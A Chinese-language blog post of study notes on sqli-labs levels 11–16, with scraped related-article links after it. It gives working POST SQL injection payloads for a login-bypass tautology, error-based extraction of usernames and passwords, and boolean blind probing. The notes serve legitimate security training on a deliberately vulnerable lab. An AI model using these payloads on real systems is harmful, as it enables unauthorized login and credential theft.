【sqli-labs】Less11~Less16
学习sqli-labs的笔记,前面的笔记内容比较详细。后面的只记录关键点了。
Less11: POST注入, 有回显,有错误提示
从11题起是POST注入,发现有两个输入框。用firefox的F12查看提交参数为
uname=&passwd=&submit=Submit
再uname上做测试
uname='&passwd=1&submit=Submit
报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and password='' LIMIT 0,1' at line 1
说明语句格式为 where a='abc' 这样的格式
最终通过永真语句绕过登陆:
uname=' or 1=1 limit 1,1-- a&passwd=&submit=Submit
Less12:
与11题几乎一样,就是闭合方式变成了("xxx")
uname=") or 1=1 limit 1,1 -- a&passwd=&submit=Submit
Less13: POST注入,无回显,有报错
用Less5的双注入,注意闭合即可
uname=') union (select count(*), concat(@@version,floor(rand(0)*2)) a from information_schema.tables group by a) -- a&passwd=&submit=Submit
获取用户名密码
uname=') union (select count(*), concat((select concat(username,'/',password) from users limit 0,1),floor(rand(0)*2)) a from information_schema.tables group by a) -- a&passwd=&submit=Submit
Less14:
与13题几乎一样,只是闭合方式变成了"a"
uname=" union (select count(*), concat((select concat(username,'/',password) from users limit 0,1),floor(rand(0)*2)) a from information_schema.tables group by a) -- a&passwd=&submit=Submit
Less15:POST注入,布尔盲注
在登陆成功和登陆失败时显示结果不同,根据这一点可以不断盲注测试。类似如下语句,需要一个字符一个字符的试。
uname=' or length(@@version)>10 -- a&passwd=&submit=Submit
uname=' or ascii(substr(@@version,1,1))>64 -- a&passwd=&submit=Submit
具体的我实在懒得试了。
Less16:
根15题一样,就是闭合方式变了变(PS:名字叫做时间盲注,但感觉完全用不到啊)
uname=") or ascii(substr(@@version,1,1))>0 -- a&passwd=&submit=Submit
【sqli-labs】Less11~Less16的更多相关文章
- 【SEED Labs】Public-Key Infrastructure (PKI) Lab
Lab Overview 公钥加密是当今安全通信的基础,但当通信的一方向另一方发送其公钥时,它会受到中间人的攻击.根本的问题是,没有简单的方法来验证公钥的所有权,即,给定公钥及其声明的所有者信息,如何 ...
- 【SEED Labs】DNS Rebinding Attack Lab
Lab Overview 实验环境下载:https://seedsecuritylabs.org/Labs_16.04/Networking/DNS_Rebinding/ 在这个实验中模拟的物联网设备 ...
- 【SEED Labs】TCP Attacks Lab
Lab Overview 实验环境下载:https://seedsecuritylabs.org/Labs_16.04/Networking/TCP_Attacks/ 本实验涵盖以下课题: • TCP ...
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- 【移动端】300ms延迟以及点透事件原因以及解决方案
产生原因 移动端会有双击缩放的这个操作,因此浏览器在click之后要等待300ms,看用户有没有下一次点击,也就是这次操作是不是双击 说完移动端点击300ms延迟的问题,还不得不提一下移动端点击穿透的 ...
- 【技巧总结】Penetration Test Engineer[2]-Information gathering
2.信息收集 信息收集是属于前期交互阶段所需要了解的问题. 2.1.前期交互内容 签署授权文件:首要要和受测试方签订授权协议. 划定范围:指定了一个二级域名作为测试目标,那么其他二级域名在测试范围内. ...
- Android加载/处理超大图片神器!SubsamplingScaleImageView(subsampling-scale-image-view)【系列1】
Android加载/处理超大图片神器!SubsamplingScaleImageView(subsampling-scale-image-view)[系列1] Android在加载或者处理超大巨型图片 ...
- SQLi_Labs通关文档【1-65关】
SQLi_Labs通关文档[1-65关] 为了不干扰自己本机环境,SQL-LAB我就用的码头工人,跑起来的,搭建也非常简单,也就两条命令 docker pull acgpiano/sqli-labs ...
- 【AR实验室】mulberryAR : ORBSLAM2+VVSION
本文转载请注明出处 —— polobymulberry-博客园 0x00 - 前言 mulberryAR是我业余时间弄的一个AR引擎,目前主要支持单目视觉SLAM+3D渲染,并且支持iOS端,但是该引 ...
随机推荐
- C#Windows 服务的安装说明
安装/卸载的步骤: 1 . .点击 开始,运行中输入cmd,获取命令提示符win7需要已管理员的身份启动,否则无法安装 2. 输入 : cd C:\Windows\Microsoft.NET\Fram ...
- 安装LDAP用户认证
LDAP伺服器设定 1.安装 openldap-servers yum -y install openldap openldap-devel openldap-servers 2.建立 LDAP 密码 ...
- Python pipenv
pipenv都包含什么? pipenv 是 Pipfile 主要倡导者.requests 作者 Kenneth Reitz 写的一个命令行工具,主要包含了Pipfile.pip.click.reque ...
- Python 爬虫四 基础案例-自动登陆github
GET&POST请求一般格式 爬取Github数据 GET&POST请求一般格式 很久之前在讲web框架的时候,曾经提到过一句话,在网络编程中“万物皆socket”.任何的网络通信归根 ...
- var/let/const区别何在??(转载)
原文地址:http://www.cnblogs.com/liuhe688/p/5845561.html let和const有很多相似之处,先说一说let吧. 1. let添加了块级作用域 我们知道,J ...
- Microsoft SQL - 学习总目录
Microsoft SQL - 数据库管理系统 Microsoft SQL - 数据类型 Microsoft SQL - 查询与更新 Microsoft SQL - 操作语句 Microsoft SQ ...
- python,类和对象(一)
万物皆对象,在python中也存在对象,首先我们需要知道面向对象的三大特征封装.继承.多态. 封装就是将一种或多种杂乱无序的代码进行有序的分类封装. 继承可以理解为孩子会继承父亲所有的东西. 多态可以 ...
- Python学习笔记-转义字符
Python转义字符同C语言的转义字符
- MFC调用libyara遇到的问题
测试结果 如果调用yara非要变成共享DLL的形式,加那么多的DLL,不如直接调用EXE文件.反而依赖vcruntime运行库的DLL会少很多... 调用libyara 调用libraya和C++调用 ...
- 日期控件datepicker的使用
引入JS: <script type="text/javascript" src="static/my/js/bootstrap-datepicker.min.js ...